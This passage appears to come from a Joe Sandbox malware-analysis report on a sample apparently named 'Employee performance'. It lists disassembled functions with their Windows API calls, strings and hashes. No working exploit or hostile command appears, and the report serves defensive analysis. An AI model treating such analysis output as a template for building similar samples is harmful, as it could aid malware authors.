Part of subcall function 0105304E: _wcslen.LIBCMT ref: 0105309B

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 01051112
WSAGetLastError.WSOCK32 ref: 01051121
WSAGetLastError.WSOCK32 ref: 010511C9
closesocket.WSOCK32(00000000), ref: 010511F9

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: 411542f2f83e35a9e5a7ddb458f99071b3a99d5b089bd39ab6b739c7827533c6
Instruction ID: 5fea2a7d6d14d5c539a584ddd55500b57e396f4fc6805ccc21446e9a50d18906
Opcode Fuzzy Hash: 411542f2f83e35a9e5a7ddb458f99071b3a99d5b089bd39ab6b739c7827533c6
Instruction Fuzzy Hash: 03412B31600204AFEB609F28C844BAEBBE9FF45364F048099FC959B295C779ED41CBE5

Function 0103CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0103DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0103CF22,?), ref: 0103DDFD

Part of subcall function 0103DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0103CF22,?), ref: 0103DE16

lstrcmpiW.KERNEL32(?,?), ref: 0103CF45
MoveFileW.KERNEL32(?,?), ref: 0103CF7F
_wcslen.LIBCMT ref: 0103D005
_wcslen.LIBCMT ref: 0103D01B
SHFileOperationW.SHELL32(?), ref: 0103D061

Strings

\*.*, xrefs: 0103CFF3

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: 8e44ea0315bece9f24bc4e345bc45ebdd13d103dd408e6ba2c102f6f2bddf1d5
Instruction ID: c46a69caed7f51650b2f80320c10e0511cd6f057aa9aa5a569cc2b371a3dcd2a
Opcode Fuzzy Hash: 8e44ea0315bece9f24bc4e345bc45ebdd13d103dd408e6ba2c102f6f2bddf1d5
Instruction Fuzzy Hash: 774155719052195FEF52EBA4DA81ADEB7FCAF58380F0000E6E689EB141EB35A744CF50

Function 01062DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 01062E1C
GetWindowLongW.USER32(00000000,000000F0), ref: 01062E4F
GetWindowLongW.USER32(00000000,000000F0), ref: 01062E84
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 01062EB6
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 01062EE0
GetWindowLongW.USER32(00000000,000000F0), ref: 01062EF1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 01062F0B

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 66c3990766660ded6639d2566ccc3282cde3b4ecf59a489a48a07bacbf70ea5a
Instruction ID: 6c21fb142d4c51ca54f652e7aa93b939937cd6b8b8fa6433dea680f642455f71
Opcode Fuzzy Hash: 66c3990766660ded6639d2566ccc3282cde3b4ecf59a489a48a07bacbf70ea5a
Instruction Fuzzy Hash: 57312430644241AFEB21CF5CDD84FA537E8FB9A710F1501A5FA908F2A6CB76A840CB01

Function 01037726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 01037769
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0103778F
SysAllocString.OLEAUT32(00000000), ref: 01037792
SysAllocString.OLEAUT32(?), ref: 010377B0
SysFreeString.OLEAUT32(?), ref: 010377B9
StringFromGUID2.OLE32(?,?,00000028), ref: 010377DE
SysAllocString.OLEAUT32(?), ref: 010377EC

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 1a771c55427616cd3c7bd3a745cc3b41c8a5f95b1fecc03bcdb17b1a47c15fbc
Instruction ID: fd97319947ae23b3632598ee0d9cc216ec98d91217a4c3d1fed49129191456c0
Opcode Fuzzy Hash: 1a771c55427616cd3c7bd3a745cc3b41c8a5f95b1fecc03bcdb17b1a47c15fbc
Instruction Fuzzy Hash: CB21B0B6604219AFEB11DEADCC88CBB77ECFB492647008066FA84DB251DA74DC41C760

Function 010377FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 01037842
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 01037868
SysAllocString.OLEAUT32(00000000), ref: 0103786B
SysAllocString.OLEAUT32 ref: 0103788C
SysFreeString.OLEAUT32 ref: 01037895
StringFromGUID2.OLE32(?,?,00000028), ref: 010378AF
SysAllocString.OLEAUT32(?), ref: 010378BD

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 081d77cb4b6532017ceef770509a8925cd04b904efdeb7887dfd637293b07ef1
Instruction ID: ae540356ce52488a77f3e5e18288388e7c4b10473fa9a1eedb0b2bf597bb381e
Opcode Fuzzy Hash: 081d77cb4b6532017ceef770509a8925cd04b904efdeb7887dfd637293b07ef1
Instruction Fuzzy Hash: 5C21C171600204AFEB209FADCC88DAA77ECEB493607008025F994CB2A5DA74DC41CB74

Function 010405A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 010405C6
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 01040601

Strings

nul, xrefs: 01040639

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: ef4b12637e06ce83b6b084f7124312954b881a18fffddc972ef6e0d50ced975d
Instruction ID: 5629ebd9f968070f5f2e4bac6c63070a570510135bdc593f4756577f3f44d98c
Opcode Fuzzy Hash: ef4b12637e06ce83b6b084f7124312954b881a18fffddc972ef6e0d50ced975d
Instruction Fuzzy Hash: 2121A6B55003059BEB209F6DC884ADA7BE4AF89724F304A69FEE2F72D8D7719540CB50

Function 010404D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 010404F2
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0104052E

Strings

nul, xrefs: 01040567

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 38482ca61c329aa4e2e6dd96a007a00bb4e832336d839d5d4c0931a3eb4116d7
Instruction ID: 83678e57a6ddbc2e328ecf78d4c0ad81e1b4fd4a7a237ef8ec0ae845722d4255
Opcode Fuzzy Hash: 38482ca61c329aa4e2e6dd96a007a00bb4e832336d839d5d4c0931a3eb4116d7
Instruction Fuzzy Hash: 362171F1500305EBEB209F29D884ADB7BE4EF45724F104A69FAE1E71E8D7719540CB60

Function 010640AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00FD604C
Part of subcall function 00FD600E: GetStockObject.GDI32(00000011), ref: 00FD6060
Part of subcall function 00FD600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FD606A

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 01064112
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0106411F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0106412A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 01064139
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 01064145

Strings

Msctls_Progress32, xrefs: 010640E3

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 9a91ac2beabc28fa7d2c859cf71c9d82dc3e29ebc422f3c6db6d44c4dff798c9
Instruction ID: bdfef38d8b799715c2954b65a0b2d36d129f15237c00b003779cc64aef258c7f
Opcode Fuzzy Hash: 9a91ac2beabc28fa7d2c859cf71c9d82dc3e29ebc422f3c6db6d44c4dff798c9
Instruction Fuzzy Hash: FE1182B215021ABEFF219E64CC85EEB7F9DEF08798F014111FA58E6150C6769C21DBA4

Function 0100D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0100D7A3: _free.LIBCMT ref: 0100D7CC

_free.LIBCMT ref: 0100D82D

Part of subcall function 010029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0100D7D1,00000000,00000000,00000000,00000000,?,0100D7F8,00000000,00000007,00000000,?,0100DBF5,00000000), ref: 010029DE
Part of subcall function 010029C8: GetLastError.KERNEL32(00000000,?,0100D7D1,00000000,00000000,00000000,00000000,?,0100D7F8,00000000,00000007,00000000,?,0100DBF5,00000000,00000000), ref: 010029F0

_free.LIBCMT ref: 0100D838
_free.LIBCMT ref: 0100D843
_free.LIBCMT ref: 0100D897
_free.LIBCMT ref: 0100D8A2
_free.LIBCMT ref: 0100D8AD
_free.LIBCMT ref: 0100D8B8

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 2933ec371357d85e0939af21d8d0365b0e51011a77ef7c4dc3c45f1a05a36567
Instruction ID: 3aac571e8af34bbd681cc50084bb9e42a53d80b87334a38304f0e981b84b7aa9
Opcode Fuzzy Hash: 2933ec371357d85e0939af21d8d0365b0e51011a77ef7c4dc3c45f1a05a36567
Instruction Fuzzy Hash: 6B113771940B45AAFA23BFF4CC49FCB7BDCBF60700F400825A2DDA60D0EA65B5058762

Function 0103DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0103DA74
LoadStringW.USER32(00000000), ref: 0103DA7B
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0103DA91
LoadStringW.USER32(00000000), ref: 0103DA98
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0103DADC

Strings

%s (%d) : ==> %s: %s %s, xrefs: 0103DAB9

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: 4f69e2289048aee5f8d6ddf4c5f69f9c349e19f5920e47cfc2b3776aa9d67908
Instruction ID: a5ea3365a5f75a751a209cc0b3122f74cd054001c93f04fe16f3851707d37cea
Opcode Fuzzy Hash: 4f69e2289048aee5f8d6ddf4c5f69f9c349e19f5920e47cfc2b3776aa9d67908
Instruction Fuzzy Hash: D70162F2500208BFF7109BE49E89EEB376CE708301F400496F7C6E6045EA799E844B74

Function 0104096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(0164E418,0164E418), ref: 0104097B
EnterCriticalSection.KERNEL32(0164E3F8,00000000), ref: 0104098D
TerminateThread.KERNEL32(010A4528,000001F6), ref: 0104099B
WaitForSingleObject.KERNEL32(010A4528,000003E8), ref: 010409A9
CloseHandle.KERNEL32(010A4528), ref: 010409B8
InterlockedExchange.KERNEL32(0164E418,000001F6), ref: 010409C8
LeaveCriticalSection.KERNEL32(0164E3F8), ref: 010409CF

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 124301a2afd15fccd5d589ee976a6a5d34fd9a63013c37bda1b6ae31525924c0
Instruction ID: 2a4db53aa06f65736638d93bfa1513b93368d33f20ae90b57cc5301fbd0b7500
Opcode Fuzzy Hash: 124301a2afd15fccd5d589ee976a6a5d34fd9a63013c37bda1b6ae31525924c0
Instruction Fuzzy Hash: B5F01D31442512BBF7615BA4EF88AD67A25BF01702F401025F281608A8C77A9465CFA0

Function 01051C60 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 01051DC0
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 01051DE1
WSAGetLastError.WSOCK32 ref: 01051DF2
htons.WSOCK32(?,?,?,?,?), ref: 01051EDB
inet_ntoa.WSOCK32(?), ref: 01051E8C

Part of subcall function 010339E8: _strlen.LIBCMT ref: 010339F2

Part of subcall function 01053224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0104EC0C), ref: 01053240

_strlen.LIBCMT ref: 01051F35

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: d8834fdd26d71a67cf63c7283a5d8d4b5a5619ee7c4c97a51bce3a8f2b37d7a0
Instruction ID: 699f4ccb9ae05673ee3347926c479e938a91a487773d86b785a92d8dcbd292d2
Opcode Fuzzy Hash: d8834fdd26d71a67cf63c7283a5d8d4b5a5619ee7c4c97a51bce3a8f2b37d7a0
Instruction Fuzzy Hash: 4BB1BF30204340AFD764DF24C885F2A7BE5AF94318F58858DF9965B2A2CB75ED42CB91

Function 00FD5D0A Relevance: 9.3, APIs: 6, Instructions: 276COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00FD5D30
GetWindowRect.USER32(?,?), ref: 00FD5D71
ScreenToClient.USER32(?,?), ref: 00FD5D99
GetClientRect.USER32(?,?), ref: 00FD5ED7
GetWindowRect.USER32(?,?), ref: 00FD5EF8

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 559c7a901b9e0ce8affa4ec4413b613e11a721d66a85adcffa9f0cc74d1f372b
Instruction ID: 26534d3c09c098c40f9639da2ffd7122bdc13ac9a71eb4bef64bd41c76424ac5
Opcode Fuzzy Hash: 559c7a901b9e0ce8affa4ec4413b613e11a721d66a85adcffa9f0cc74d1f372b
Instruction Fuzzy Hash: 91B18C35A0074ADBDB14DFA8C4807EEB7F2FF48310F18851AE8A9D7254DB34AA51DB54

Function 010001B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 010000BA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 010000D6
__allrem.LIBCMT ref: 010000ED
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0100010B
__allrem.LIBCMT ref: 01000122
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01000140

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction ID: 1c8448dce8cc15a174d1d1ffe8294a1e8b22dd9f4545ed7bf929efcdd96bbd19
Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction Fuzzy Hash: 70811676A00B069BF7269E78CC40BAB73E9AF51764F24463EF691D72D0E774D9008B90

Function 010061FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00FF82D9,00FF82D9,?,?,?,0100644F,00000001,00000001,8BE85006), ref: 01006258
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0100644F,00000001,00000001,8BE85006,?,?,?), ref: 010062DE
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 010063D8
__freea.LIBCMT ref: 010063E5

Part of subcall function 01003820: RtlAllocateHeap.NTDLL(00000000,?,010A1444,?,00FEFDF5,?,?,00FDA976,00000010,010A1440,00FD13FC,?,00FD13C6,?,00FD1129), ref: 01003852

__freea.LIBCMT ref: 010063EE
__freea.LIBCMT ref: 01006413

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 7034a82da91fcac003f688c616e2d4ef6f98624b6124d1c98923a4d114a2e252
Instruction ID: 3a167b4512316bd94e8d1b5198120e3360e9c942e8fa05175ecf796e2b43383e
Opcode Fuzzy Hash: 7034a82da91fcac003f688c616e2d4ef6f98624b6124d1c98923a4d114a2e252
Instruction Fuzzy Hash: DD51E872600216AFFB274E64CC81EAF7BEAEF44650F158269FD45DA1C0DB36DC50C6A0

Function 0105BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD9CB3: _wcslen.LIBCMT ref: 00FD9CBD

Part of subcall function 0105C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0105B6AE,?,?), ref: 0105C9B5
Part of subcall function 0105C998: _wcslen.LIBCMT ref: 0105C9F1
Part of subcall function 0105C998: _wcslen.LIBCMT ref: 0105CA68
Part of subcall function 0105C998: _wcslen.LIBCMT ref: 0105CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0105BCCA
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0105BD25
RegCloseKey.ADVAPI32(00000000), ref: 0105BD6A
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0105BD99
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0105BDF3
RegCloseKey.ADVAPI32(?), ref: 0105BDFF

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

